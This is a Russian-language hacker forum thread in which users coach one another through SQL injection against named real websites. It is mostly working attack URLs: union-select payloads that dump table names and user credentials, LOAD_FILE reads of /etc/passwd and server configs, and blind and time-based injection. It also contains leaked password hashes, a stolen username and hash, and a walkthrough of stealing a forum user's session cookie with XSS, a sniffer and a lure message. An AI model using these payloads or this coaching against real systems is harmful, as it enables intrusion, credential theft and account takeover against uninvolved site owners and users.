>у меня еще несколько вопросов.
>1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,3,4,5,6/*
>2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Зависит от самого запроса, например
"SELECT `date`,`post` FROM `forum` where id='".$id."' and id > 5;"
тут нужно будет ставить кавычку и получится
"SELECT `date`,`post` FROM `forum` where id=''SQL-inj /* and id > 5;'"
т.е. мы "выходим" из id=''
- ставить не обязательно, нужно лишь чтобы "левы" (не наш) запрос не выполнился, это можно сделать "-", and 1=0, or 1=1, limit 0 и т.д.
>3. что можно сделать, кроме брута, если версия бд меньше 5?
посимвольный подбор\угадывание. Если сайт на паблик двиге - установить двиг и посмотреть

1. Это скуля
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,aes_decrypt(aes_encrypt( user(),0x71),0x71),4,5,6/*

2. когда перменная строкового типа (присутствуют не только цифры) надо ставить кавычку
когда переменная "числовая" надо ставить минус (хотя и не обязательно), но бывает, что даже если присутствуют только цифры, это все равно переменная строкового типа, в таком случае надо ставить кавычку... (т.е. закрывать для корректности запроса)

3. только искать заранее известные таблицы, например если есть на сайте форум phpBB, то логично искать табличку phpbb_users, хотя иногда форум располагается в другой БД, тогда надо знать еще и имя БД форума, также при установке форума, иногда меняют префикс (phpbb_) тогда его тоже нужно подбирать

у меня еще несколько вопросов.
1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
тут просто ошибка скрипта, а скуля нет, так?
с чего ты взял? здесь сто процентная иньекция -
http://www.wolfpublishers.nl/us/news.php?id=15+union+select+1,2,convert(version()+ using+latin1),4,5,6/*
2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Минус ставиться для перехода к несуществующим значениям переменной, делаеться в тех случях когда при правельном запросе возвращаеться исходная страница и не видно принтабельных столбцов ( можно перейти не только с помощью минуса но и влепить слишком большое значие e.x =999999+union..

3. что можно сделать, кроме брута, если версия бд меньше 5?

Что ты подрузомеваешь под брутом, если перебор действительных значений таблиц и колонок то да

http://www.hackzona.ru/hz.php?name=Forums&file=viewtopic&t=14033

при этом запросе хакзона пишет

Общая ошибка

Could not obtain user vote data for this topic

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4

SELECT vote_id FROM voov_bbvote_voters WHERE vote_id = 331 AND vote_user_id =

Line : 747
File : /usr/home/www/a11/modules/Forums/viewtopic.php

это скуль?, если да то в каком параметре он?

http://www.hackzona.ru/hz.php?name=Forums&file=viewtopic&t=14033 при этом запросе хакзона пишет
Только что ходил по ссылке - все нормально.

мля я захожу у меня ошибка sql синтаксиса пишет хз

http://se-t.net/index.php?pg=
Есть ли тут инклюд?

http://se-t.net/index.php?pg=
Есть ли тут инклюд?
Нет. Там есть функция file и вряд ли что получится сделать.

Ребят может не в тему, но каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?

2 nikoTM
Примерно таким:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";

Тогда при вставке твоего кода получается:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';
То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.

1ten0.0net1, спасибо

Как можно замутить иньекцию если стоит запрос
$mysql_query="SELECT * FROM что-то ORDER BY".$_GET['sb'];

?

Хм... никак.... Тут даже посимвольный брут не канает...

понятно :)

Хм... никак.... Тут даже посимвольный брут не канает...

эх ошибаешься, ой ошибаешься...
здесь можно замутить инъекцию, для этого обязательно должен быть вывод даннных на страницу, а дальше с помощью подзапросов, как говорит I-I()/Ib, с помощью посимвольного брута, но это не всегда возможно

Обьявляется миниконкурс на запрос с Order By , приз - плюсы посетивших страницу.

Гыыы я уже начал:


вот описание подобной инъекции в движке рейтинга сайтов:
http://forum.antichat.ru/thread51884.html

еще наглядный пример инъекции после order by в движке статистики psychostat

ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен

ребята вот нашол плохую фильтрацию
http://tien.ru/?p=7&GroupID=20'
как дальше разрабатывать sql иньекцию, если можно на примере, заранее благодарен

плохо то, что это Microsoft Access и здесь нет возможности отбросить (закомментировать) часть запроса, даже %00 в данном случае фильтруется (покрайне мере неработает)
для эксплуатации этой скули можно использовать подзапросы для этого надо подобрать название таблицы и соответственно название поля, вот пример рабочего подзапроса:
http://tien.ru/?p=7&GroupID=20') and (mid((select top 1 id from news),1,1)<'a

если хочешь что-то получить из этой скули, подбирай имя таблицы с пользователями и соответственно колонки с полезной информацией

у меня при таком запросе
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,mysql.user.password,4+from+mys ql.user/*
сайт выдаёт такие хеши:

*0380AF57CC89BDDCEB2E4F020087C5660FB8467C


*52868E15C27788B69F9716CF4C3762C430D7FA49


*1AEF7A19D6DE950A96EE5CCDD3388618C30C95E6


*7EBF4B5C89AA3609F2AD90A4D19046F30C15FF9B


*7EF015DF6D56998DC460036F742293B666BCBDA4
у меня вопрос, какого типа эти хеши, на мд5 непохоже, и от чего они, как я могу их испольховать когда расшифрую

это хеши mysql5 использовать ты сможешь их для подключения к БД,
только лучше сделать такой запрос:
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,concat(host,0x3a,user,0x3a,pas sword),4+from+mysql.user/*

и мы видим что с правами root можно подключится без пароля, но для этого нужен какой нибудь mysql клиент, на этом сервере, например phpMyAdmin

но я советую попробовать их "расшифровать", т.к. иногда пароли от БД подходят и для других сервисов например ftp или ssh

а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?

а со своего компа не получиться подключиться?
я пробовал выполнить команду LOAD_FILE('/etc/passwd') а у меня ошибку пишет, это значить я немогу записывать и читать файлы?

со своего компа ты не подключишься, LOAD_FILE('/etc/passwd') не прокатывает по двум причинам: 1)фильтрация кавычек (мэйджик квотс включен) 2)даже если закодировать /etc/passwd в hex (LOAD_FILE(0x2F6574632F706173737764)) у тебя нет файловых привелегий и читать и записывать файлы ты не сможешь

Дам-с,на мой вопрос так никто и не ответил...

SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,1,(select 1 union select 2 ) )

Дам-с,на мой вопрос так никто и не ответил...

как это не ответил, я в http://forum.antichat.ru/thread51884.html

этом посте помоему понятно описал использование инъекции в order by, а то что я дал линк, а не описание, это потому, что не вижу смысла в двух одинаковых постах на форуме

Есть Sql Inj в движке и есть Xss в некотором параметре в профиле пользователя. Нужно, внедрить Xss в этот параметр строго у определённого юзера из БД. Есть варианты?

Если это мускул, то нет вариантов, если другой тип БД, то смотря какой тип

Ну допусти если это Mssql то ты можешь разделять запросы с помошью ; и вставить запрос например Update и изменить данные пользователя в БД например на ядовитый скрипт. т.о когда пользователь зайдет в свой профиль, сработает активная Xss и соответственно получишь куки пользователя на снифер

Ок , а если иньекция в order by и вывода нет ? ответит кто? %)

Чет универсального способа немогу придумать, ты хоть намекни, я понимаю, что при таком раскладе нужно составить условие при котром один из вариантов вызывает ошибку, а т.к. сначала происходит проверка синтаксиса то и этот вариант отпадает, еще есть вариант использования into outfile но это настолько специфично (зависит от настроек php и прав пользователя mysql) что я не рассматриваю это как вариант

Заставил юзера пройти по ссылке шоп его куки шли на сниффер.
Прошел,Вижу куки.Что делать с этим?
Имя переменной Значение
ACCEL_ADDR
HTTP_ACCEPT */*
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_ACCEPT_LANGUAGE ru
HTTP_CACHE_CONTROL
HTTP_CONNECTION close
HTTP_COOKIE PHPSESSID=21ac6a328e4aa73ce55ef32e2b3193f0
HTTP_HOST tx.tehnofil.ru
HTTP_REFERER http://forum.netis.ru/index.php?act=Msg&CODE=03&VID=in&MSID=277026
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRA 4.10 (build 01952); MRSPUTNIK 1, 8, 0, 17 SW; .NET CLR 1.0.3705)
LANG
MM_CHARSET
REMOTE_PORT 57014
SERVER_ADDR 127.0.0.1
SERVER_ADMIN support@uploader.ru
SERVER_NAME tx.tehnofil.ru
SERVER_PORT 80
SERVER_SIGNATURE Apache/1.3.37 Server at tx.tehnofil.ru Port 80
SERVER_SOFTWARE Apache/1.3.37 (Unix) PHP/4.4.7 mod_ssl/2.8.28 OpenSSL/0.9.7e
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING id=test
REQUEST_URI /tsk.php?id=test
SCRIPT_NAME /tsk.php
PHP_SELF /tsk.php

forum.netis.ru это форум где надо угнать куки

mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.7272 сек)

mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=48,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.0006 сек)

а Как
Вот в куках есть
Member_id:это я нашол
Pass_hash:а суда чито ставить?*

А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме.
Подскажите с инъектом,я ток начал пробовать..
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATI ON_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1 ,1+--+
Я так понял, что фильтруется кавычка, как можно это сделать иначе ?

Авторизирован.
Я ему отослал на форуме лс:
Привет.Зайди,скачай пак анекдотов.
Он зашел и все....
ОН АВТОРИЗИРОВАН.

zamut,
Where+table_name=название в хексе
Where+table_name=название в чаре

2delay(0)
спс, сейчас попробую..

извиняюсь, версию недоглядел..автор, наверно, допустил опечатку
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMAT I ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+ 1 ,1+--+

http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/*
можно ли сюда шелл залить или пароль получить от админки? или от БД

Шелл не зальешь. Файл прив выключен, есть экранирование кавычек.
Прав на чтение mysql.user нет

Версия мускула 5, можно узнать имена таблиц и столбцов
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INF ORMATION_SCHEMA.tables+limit+16,1/*
вот например таблица _a3access

http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INF ORMATION_SCHEMA.tables+limit+16,1/*

Для просмотра меняшь limit.
вот пример просмотра столбцов в этой же таблице

http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+IN FORMATION_SCHEMA.columns+where+table_name=0x5F6133 616363657373+limit+0,1/*

Для просмотра других столбцов также меняешь лимит

ещё вопрос, как изменять данные которые находяться в столбцах

ещё вопрос, как изменять данные которые находяться в столбцах

При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"

Подскажите: на сайте сделал так: https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=-1
На странице выпала стесно оштбочка следующего содержания:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/dist/html/include/gen/forum.php on line 110
Вопрос: это и есть SQL-injection? Если да, то какие действия далее?(+union+select+nul-- ничего не дает, даже это: +union+select+@@version+)

В двух словах не рассказать. Ищи основы проведения инъекций.
Либо можешь просмотреть сразу примеры:
http://forum.antichat.ru/thread21336.html

Для начала, неплохо бы обратиться к статьям, их ведь не от нечего делать писали.
http://forum.antichat.ru/thread43966.html

Ну тогда хотя бы скажите это Sql инъекция или липа?

Ну надо полагать что да... Хотя ссылку бы кинул, глянул может...

сначала проверь саму sql-inj

https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=1/*
данные выведутся
https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=2/*
не выведутся

потом подбери количество столбцов

https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+order+by+[number]/*
ну а потом проверь версию и тд
все можно вывести в одном столбце CONCAT_WS(0x3A,VERSION(),USER(),DATABASE())

з.ы. если не пройдут юнионы проверь через условие версию and+(ascii(substring(VERSION(),1,1))=51)
з.з.ы вместо [что-то] надо подставить данные
з.з.з.ы. это не алгоритм а лишь один из вариантов дальнейших действий

да и вобще, это MySQL, а не MSSql который та пытаешься пользовать, даже в сообщении об ошибках это видно

https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=[реальный индекс]+and+1=2/*
halkfild, даже при этом данные выводятся :( Блин, да что ж такое!
Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL :rolleyes: ). halkfild, посоветуй, что нибудь ещё, очень прошу!

halkfild, даже при этом данные выводятся :( Блин, да что ж такое!
Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL :rolleyes: ). halkfild, посоветуй, что нибудь ещё, очень прошу!
Понимаешь в чем беда, тут вариантов масса...
Кстати попробуй закрыть кавычкой [реальный индекс]...
Или кинь ссылку тогда в личку чтоле если так боишся выкладывать...
PS это не "единственный выход" еще как вариант набить морду тому кто это сделал :))

Да он давал уже ссылку. Вроде там ниче не сделать

Здравствуйте! :)

По SQL injection FAQ (http://forum.antichat.ru/thread43966.html) и ещё одному FAQ (http://injection.rulezz.ru/MySQL-SQL-Injection.html) вытащил файл '/etc/passwd' через LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119 ,100)), а в нем НЕТ НИ ОДНОГО пароля!

Имеет вид:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin SSH:/var/empty/sshd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin trasfert:x:500:500::/home/trasfert:/bin/bash ftpdumprm:x:501:501::/home/ftpdumprm:/bin/bash

Пароль root есть в MySQL хеше, подбирается, но вероятность не велика ))

Подскажите, с этими данными что-нибудь можно сделать? Где нормальный файл с паролями может лежать?

Спасибо!

попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе

попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе
а в какой папке его можно искать?
/conf/.httpdconfig
/.httpdconfig
/etc/.httpdconfig нет :(

поищи раскрытие путей на сайте что бы получить полный путь..
попробуй почитать конфигы форума, сайта

так же конфигы http://forum.antichat.ru/thread49775.html /*тут они относительные, переделай под полныйпуть*/

з.ы. попробуй вывод в файл, сделай себе шелл, если есть права на запись в директорию

Спасибо, буду пробовать пути :)

шелл не получится - кавычки нельзя использовать :(

fervex используй хекс

Piflit, если кавычки экранируются, шелл не зальешь, ибо в них нужно будет указывать путь, в хексе он работать не будет

Подскажите возможно ли с помощью information_schema узнать таблицу в которой находится email админа,и как этот запрос должен быть составлен? Мыло админа известно,а вот таблица где должен по идее и хеш с логином лежать-нет ( конечно можно проверить каждую таблу на содержание интересующего,но их там более 500,а вывод колонок по 1 еденице. Пробовал наиболее вероятные таблицы-безрезультатно.

чтото типа этого
union select table_name from information_schema.columns where column_name like '%25mail%25'/*

вобще правильно ставить % в like, но лучше использовать url-кодировку


Это ты получаешь имя таблиц где есть поле в названии которого есть сочетание mail, а там limit`ом перебирай

можешь также подставлять user,admin,pass,login и т.д.

Что дальше делать с этим счастьем? Желательно подробно и в примерах...)
P.S. сам только учусь)
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(C ONCAT_WS(0x3A,VERSION(),USER(),DATABASE()),0x71),0 x71),7,8,9,10,11,12,13,14/*
Выводит:
4.1.15:d11071sa14532@z17.zone.ee:d11071sd8708

можно ли обойти бан по наомеру телефона?

Подскажите пожайлуста статью по БД MySQL 4.x

Подскажите пожайлуста статью по БД MySQL 4.x
Тебе про что? Про sql injection или просто хелп по этой версии?

2I-I()/Ib SQL-инъекции..

2I-I()/Ib SQL-инъекции..
Вообщем что тебе хочу сказать...
Первое посети вот это http://forum.antichat.ru/thread19610.html или почитай вот это http://forum.antichat.ru/thread43966.html
Во вторых писать специальные статьи под каждую версию это дебилизм...
В третих насколько я помню основное отличие MySQL 4.x от остальных это появление подзапросов, и отсутствие базы INFORMATION_SCHEMA которая появляется в 5 версии...

www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order=
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'

Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Что деать дальше? Как узнать хеш\пароль админа?

www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order=
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'

Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Что деать дальше? Как узнать хеш\пароль админа?
Где ты там увидел иньекцию? Ну на хрена чужое врямя тратить?! Теперь я понимаю почиму у тебя -20 стоит...

I-I()/Ib
панятно, а почему ошибка получается?

Чем можно расшифровать пароль такого вида:
Fl9fXPUerGzG
ПассвордПро не берёт, словарей наверное мало...)

I-I()/Ib
панятно, а почему ошибка получается?
Ткни мне не умному на ошибку...
Чем можно расшифровать пароль такого вида:
Fl9fXPUerGzG
ПассвордПро не берёт, словарей наверное мало...)
Это смотря окуда ты этот пароль взял... Скорее всего какой то свой алгоритм имхо...

Это смотря окуда ты этот пароль взял... Скорее всего какой то свой алгоритм имхо...
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*

http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*

да скорее всего самописный какойто (оч похоже на base64, но это не просто base64 а что то еще, хотя хз), читай скрипты, ищи где это осуществляется:
вот тебе httpd.conf
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_fi le('/usr/local/apache/conf/httpd.conf'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32/*
вот тебе index.php
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_fi le('/home/vhost/curufc.com/html/index.php'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32/*

вобщем ковыряй, если это действительно нужно

помогите доработать скулю, если ето возможно
http://www.kauma.ru/showpicture.php?image=-3+union+select+1,2,3,4,5,6,7,8,9,1/*

Так, сюда вроде задают вопросы, вот и я задам, надеюсь не будет оффтопом.
Нашел сайт. Делал Sql и получал вот такую страницу при запросе =1'
Скрин номер раз (http://smages.com/91/da/91da9fde43b9952132c54bf583b033ad.jpg.htm)
Ну в принципе все стандартно, тока почему то на отдельной странице.
Но если сделать кривой запрос, например: ='-1 то получаем вообще вот такое:
скрин номер два (http://smages.com/71/37/713764782daf274d1ee5e21b97d27519.jpg.htm)
Скажите что за баг, и можно ли его испльзовать? Есть ли полезность?
Заранее спасибо...

2Twiddle обычная sql-inj, скорей всего можно исползовать, ну и значит определеннные даннные ты наверное сможешь получить

Скажите народ, вот если сайтик на одних html' ках построен, то есть без скриптов всяких, получается и зацепится не за что?

Ситуация такая:
Имею эстонский сайт с инъектом, кол-во колонок подобрал, есть табличка users. Версия мускула 4.1.22. Трабла в том, что не могу подобрать столбцы в users. Ни один из ниже перечисленных не подходит.

id
login
user
name
nickname
nick
user_name
password
pass
pwd
pws
User_password
host

Прошу, если кто-то сталкивался с такой проблемой подсказать.
Быть может имена столбцов на национальном языке..

Ситуация такая:
Имею эстонский сайт с инъектом, кол-во колонок подобрал, есть табличка users. Версия мускула 4.1.22. Трабла в том, что не могу подобрать столбцы в users. Ни один из ниже перечисленных не подходит.
Прошу, если кто-то сталкивался с такой проблемой подсказать.
Быть может имена столбцов на национальном языке..

1. попробуй проверить или есть права на чтение файлов /load_file(_полный_путь_к_файлу_)/ если есть то всё таблицы, колонки можно вытянуть из скриптов.

2. это способ который помогает мне в 80% - просматриваешь исходники страницы и находишь что-то в этом роде "....<input type="password" name="pwd"/>....", значение параметра name, обычно, совпадает с именем столбца.

2 Zamut ентих вариантов стандартных, еще целая куча может быть, причем не на национальном языке, дай линк, попробую помочь

а по-эстонски я знаю:

login:
kasutaja
kasutajanimi
kasutajatunnus

pass:
parool
salasõna

2 big_BRAT спасибо, частично помогло)
Теперь ситуация такая:
имею большой ресурс, кол-во столбцов известно, (!ни один из них не выводится на экран!),есть табличка mysql.user в табличке есть столбцы user и password. Есть ли возможность, что-то достать ?

, (!ни один из них не выводится на экран!),
смотри исходник страницы,может там есть,и поставь - перед ?id=-1

ни один из них не выводится на экран
Не забывай про convert(), aes_decrypt(aes_encrypt())

Не забывай про convert(), aes_decrypt(aes_encrypt())
ога, ещё не забывай мыть руки перед едой
Скажи мне чем конверт и аес помогут ему в случае отсутствия принтабельных полей?

Народ подскажите мне можно ли при помощи посимвольного перебора подбирать название таблиц и колонок , иначе я непойму нафиг он тогда нужен ?
-http://www.teleset-ufa.ru/news.php?id=1+and+substring(user(),1,1)=0x74
юзер() и так же выводиться, нафига в мануалах учат на таком примере. Просьба не предлагать юзать перл скрипты для брута таблиц, один хрен если попадеться таблица с именем qwaszx_admin_zxewq её не сбрутиш. Заранее сенкс 8)

Это называется blind-inj, т.е. если допустим у тебя нет возможности вывести на страницу (увидеть) данные, то тебе придется использовать такие вот подзапросы и подбирать данные посимвольно, иногда бывает не возможно использовать union select, в таком случае опять же помогает использование подзапросов (таких вот логических операций)
, также это единственный способ использовать sql инъекцию после order by, да я понимаю долго и неудобно (хотя можно автоматизировать) но иногда (очень часто) это единственный способ получить данные из sql инъекции

если версия мускула 5 ветки, то можно подбирать имена таблиц и колонок таким способом, но это опять же получение данных с помощью подзапроса из определенного столбца и определенной таблицы

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?
Дальше надо прочитать хоть пару статей про sql-inj....

Смотрим таблицы,далее колонки....и будет тебе счастье)
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION _SCHEMA.TABLES+limit+1,1/*

2Extremal в твоем случае нет, это Mysql, при mysql-inj нельзя использовать две конструкции сразу, в MSSQL можно с помощью ;

2Mike 007 если такой запрос выдаст например root@10.10.10.205, то сразу открываются большие перспективы при использовании sql-inj

Здравствуйте! :)

Есть БД MySQL 5.0.27, уязвимая, кавычки использовать нельзя.
Вид такой:
.php?id=100+union+select+null,email,null+from+user s+where+regID=5/*

Скажите, как к этой строке корректно добавить update+set или нечто подобное, чтобы у юзера с regID=5 изменить значение поля email?

Спасибо! :)

в mysql по секурным соображениям нельзя так, вобщем выше написано.

в mysql по секурным соображениям нельзя так, вобщем выше написано.
что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?

что, UPDATE никак не получится корректно поставить в запрос?
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nva rchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar )+from+Users)-
получаю
Microsoft OLE DB Provider for SQL Server error '80040e21'

Line 1: Incorrect syntax near 'cast'.
Что не так?

что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
не получится ибо в подзапросах тока select и после union тоже тока select
Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nva rchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar )+from+Users)-
получаю

Что не так?

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nva rchar)+':'+cast(UserPassword+as+nvarchar)+from+Use rs)--непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае

если захотел как суперхеккер сделать
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.

народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз

смотришь когфиг, там пасс, юзер и адрес от БД.
Заходишь в эту бд. Смотришь таблтцу с юзверями
Ищешь админа - брутишь хэш.
Меньше мороки - просто меняешь хэш
А лучше - вставить новую запись

ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами

Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2 bUserPassword+from+Users)--

ну как то так

http://www.pp-pss.ru/main.php?ID=-1
помогите пожалуйста со скулем перебрал до 41 поля
http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41/*
замучился может по другому как то надо

asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2 bUserPassword+from+Users)--

ну как то так
Мимо, проверяй пм.

http://www.pp-pss.ru/main.php?ID=-1
помогите пожалуйста со скулем перебрал до 41 поля
http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41/*
замучился может по другому как то надо
Он же не ругается да different column а тупо выводит твой запрос. Эдак до потери пульса можно подбирать =) Смотри что там фильтруется и меняй запрос.

http://www.pp-pss.ru/main.php?ID=

1 колонка. без вывода. если мускул выше 4.0.* то возможен посимвольный перебор//

но тут 4.0.*. .поэтому он невозможен)

Если в ссылке на Личное письмо (http://forum.netis.ru/index.php?act=Msg&CODE=03&VID=in&MSID=282904) в IPB 1.3 подставить в конце ' , то вместо Обнаружена ошибка: Такого сообщения не существует Напишет вот что : Обнаружена ошибка:.Просто пустой текст.Что это может быть?
Также если по той же самой ссылке поставить '; -- то выдаст пустой текст ошибки.

Что это может быть?
ИМХО: ничего!
инъекта там нет

[aywo]
А там вообще чего есть?

2YaNeLam что ты имеешь ввиду?

ну там вообще на Ipb 1.3 патченом есть Sql?

тебе сюда _https://forum.antichat.ru/thread15678.html

http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables/*
что дальше делать не подскажите?

что дальше делать не подскажите?
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_ name),4,5+from+information_schema.columns+where+co lumn_name=0x70617373776F7264+--+
progettocompetence_it:areariservata_utenti
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+informatio n_schema.columns+where+table_schema=0x70726F676574 746F636F6D706574656E63655F6974+and+table_name=0x61 7265617269736572766174615F7574656E7469+limit+1,1+--+
id
userid
password
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,passwo rd),4,5+from+progettocompetence_it.areariservata_u tenti+limit+0,1+--+
1:Ilic:ff112557a3a0a4d1e74f56e0ac979467

Крути limit ....

